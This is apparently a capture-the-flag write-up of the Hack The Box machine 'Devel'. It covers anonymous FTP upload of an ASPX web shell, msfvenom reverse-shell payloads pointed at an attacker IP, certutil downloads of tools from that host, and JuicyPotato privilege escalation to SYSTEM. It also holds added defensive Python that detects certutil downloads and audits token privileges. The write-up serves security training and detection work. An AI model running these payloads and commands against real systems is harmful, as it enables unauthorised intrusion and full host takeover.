HTB Writeups
Boxes: Easy

Devel

Personal Rating: Medium

Last updated 1 year ago

Enumeration

sudo nmap -sV -sC <IP>

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7

It looks like I can access the directory of the IIS web server via FTP.

If I can write files here, I can place an ASPX web shell.

As seen here, this works.

Shell Access

Generating a web shell payload:

msfvenom -p windows/shell/reverse_tcp LHOST=10.10.16.6 LPORT=4444 -f aspx > shell.aspx

I received a connection, but it dies as soon as I give a command and shows no output.

I placed antak.aspx on the host with the same FTP put method. This worked, so I will create a shell from here.

Internal Enumeration

PS> whoami

iis apppool\web

Got the user babis.

I ran systeminfo on the host and saved the output to a file, then ran wesng (Windows Exploit Suggester NG) over it to check for missing patches. The system appears to be an unpatched Windows 7, so there should be plenty.

Perfect, this worked: certutil.exe -urlcache -f http://10.10.16.6:8000/winPEASx86.exe C:\Users\Public\winpeasx86.exe

Let's see if this works: cmd /c C:\Users\Public\winpeasx86.exe > C:\Users\Public\peasout.txt

I could get a proper reverse shell by creating this payload and uploading it with certutil:

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
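The certutil -urlcache downloads used above are a well-known LOLBin pattern and a reliable detection hook. As an added example (not part of this writeup), the following Python flags certutil downloads in process-creation events and marks the ones run by a service identity such as an IIS application pool; the event records are constructed, modelled on the commands in this section.

```python
"""Flag certutil.exe used as a downloader (urlcache -f <url> <dest>) in
process-creation events. Added example for this writeup, not its code."""
import re

# certutil invoked by bare name or full path, with a urlcache switch and a URL
CERTUTIL_RE = re.compile(r"(?:^|[\\/\s\"'])certutil(?:\.exe)?[\"']?\s", re.IGNORECASE)
URLCACHE_RE = re.compile(r"[-/]urlcache\b", re.IGNORECASE)
URL_RE = re.compile(r"(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)
EXEC_EXT = (".exe", ".dll", ".ps1", ".bat", ".vbs", ".aspx")
# Built-in service identities that have no business fetching files from the network
SERVICE_PREFIXES = ("IIS APPPOOL\\", "NT AUTHORITY\\NETWORK SERVICE", "NT AUTHORITY\\LOCAL SERVICE")


def classify_certutil(cmdline):
    """Return a finding for a certutil download, or None for anything else."""
    if not (CERTUTIL_RE.search(cmdline) and URLCACHE_RE.search(cmdline)):
        return None
    m = URL_RE.search(cmdline)
    if m is None:
        return None
    tail = cmdline[m.end():].split()
    dest = tail[0].strip("\"'") if tail else None
    # Writing an executable to disk is worse than a plain cache fetch
    severity = "high" if dest and dest.lower().endswith(EXEC_EXT) else "medium"
    return {"url": m.group(0), "dest": dest, "severity": severity}


def scan(events):
    """events: iterable of {"user": ..., "cmd": ...} process-creation records."""
    findings = []
    for ev in events:
        f = classify_certutil(ev["cmd"])
        if f is None:
            continue
        f["user"] = ev["user"]
        f["service_account"] = ev["user"].upper().startswith(SERVICE_PREFIXES)
        findings.append(f)
    return findings


# Constructed sample events, modelled on the commands in this writeup
SAMPLE_EVENTS = [
    {"user": "IIS APPPOOL\\Web",
     "cmd": "certutil.exe -urlcache -f http://10.10.16.6:8000/winPEASx86.exe C:\\Users\\Public\\winpeasx86.exe"},
    {"user": "CORP\\admin", "cmd": "certutil -hashfile C:\\tmp\\setup.msi SHA256"},
    {"user": "IIS APPPOOL\\Web", "cmd": "cmd /c C:\\Users\\Public\\winpeasx86.exe > C:\\Users\\Public\\peasout.txt"},
    {"user": "IIS APPPOOL\\Web",
     "cmd": "C:\\Windows\\System32\\certutil.exe -urlcache -f http://10.10.16.6:8000/privshell-x86.exe privshell.exe"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```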

The user holds privileges that would allow privesc regardless of any unpatched vulnerabilities:

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

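An added example (not from the writeup) that parses this whoami /priv listing and flags the privileges that matter for token abuse. It goes beyond the two present here to the other token-related rights a defender would audit on a service account; the sample listing is the one shown above.

```python
"""Audit a `whoami /priv` listing for privileges that let a compromised account
obtain or act under other accounts' tokens. Added example, not the writeup's code."""
import re

# Matches both the aligned whoami /priv table and a whitespace-collapsed copy
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")

# Token-related rights to flag on a service account. State is irrelevant to the
# risk: a Disabled privilege can be re-enabled by the process that holds it.
TOKEN_RIGHTS = {
    "SeImpersonatePrivilege": "impersonate client tokens; granted to IIS app pool identities by default",
    "SeAssignPrimaryTokenPrivilege": "start processes under another account's token",
    "SeCreateTokenPrivilege": "forge arbitrary tokens",
    "SeDebugPrivilege": "open any process, including SYSTEM ones",
    "SeBackupPrivilege": "read any file regardless of ACLs",
    "SeRestorePrivilege": "write any file regardless of ACLs",
}


def parse_privileges(text):
    """Return {privilege: {"description": ..., "state": ...}} in listing order."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = {"description": m.group(2), "state": m.group(3)}
    return privs


def audit_privileges(text):
    """Return the token-related privileges present, with their state and risk."""
    return [
        {"privilege": name, "state": info["state"], "risk": TOKEN_RIGHTS[name]}
        for name, info in parse_privileges(text).items()
        if name in TOKEN_RIGHTS
    ]


# The listing from this writeup (iis apppool\web on Devel)
SAMPLE_PRIV = """\
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
"""
```

Running audit_privileges(SAMPLE_PRIV) returns SeAssignPrimaryTokenPrivilege (Disabled) and SeImpersonatePrivilege (Enabled), which is exactly the pair the rest of this writeup relies on.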
It seems like I cannot really use winpeas as I do not get any output.

Privilege Escalation

Doing more research on the output of this:

python3 wes.py /HTBfolder/Boxes/HTB-Devel/systeminfo.txt -s critical > /HTBfolder/Boxes/HTB-Devel/wes-output.txt

Trying CVE-2010-0232, I found this resource: http://www.exploit-db.com/exploits/15609/

I found the exploit with searchsploit, and it looks promising:

searchsploit kitrap

Exploit Title | Path
Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015) | windows/local/11199.txt

Shellcodes: No Results

searchsploit -p 11199

  Exploit: Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015)
      URL: https://www.exploit-db.com/exploits/11199
     Path: /usr/share/exploitdb/exploits/windows/local/11199.txt
    Codes: CVE-2010-0232, OSVDB-61854, MS10-015
 Verified: True
File Type: assembler source, ASCII text

kate /usr/share/exploitdb/exploits/windows/local/11199.txt

Actually, screw this, I want to try JuicyPotato again as it is basic and common. We need an x86 version of it in this case.

Generating a new shell:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.6 LPORT=7777 -f exe > privshell-x86.exe

Getting the exploit:

Transferring the exploit:

Transferring the shell:

certutil.exe -urlcache -f http://10.10.16.6:8000/privshell-x86.exe privshell.exe

Exploitation:

juicypotato.exe -p C:\Users\Public\privshell.exe -l 1337 -t * -c {4991d34b-80a1-4291-83b6-3328366b9097}

With a netcat listener open on my host, this worked!

If it had not worked, I would have tried some other CLSIDs; there are lists online and tools to list them on the device.

This did not work:

certutil.exe -urlcache -f http://10.10.16.6:8000/Juicy.Potato.x86.exe juicypotato.exe

References:
GitHub - ivanitlearning/Juicy-Potato-x86: Juicy Potato for x86 Windows
GitHub - ycdxsb/WindowsPrivilegeEscalation: Collection of Windows Privilege Escalation (Analyse/PoC/Exp...)
Impersonating Privileges with Juicy Potato (Medium)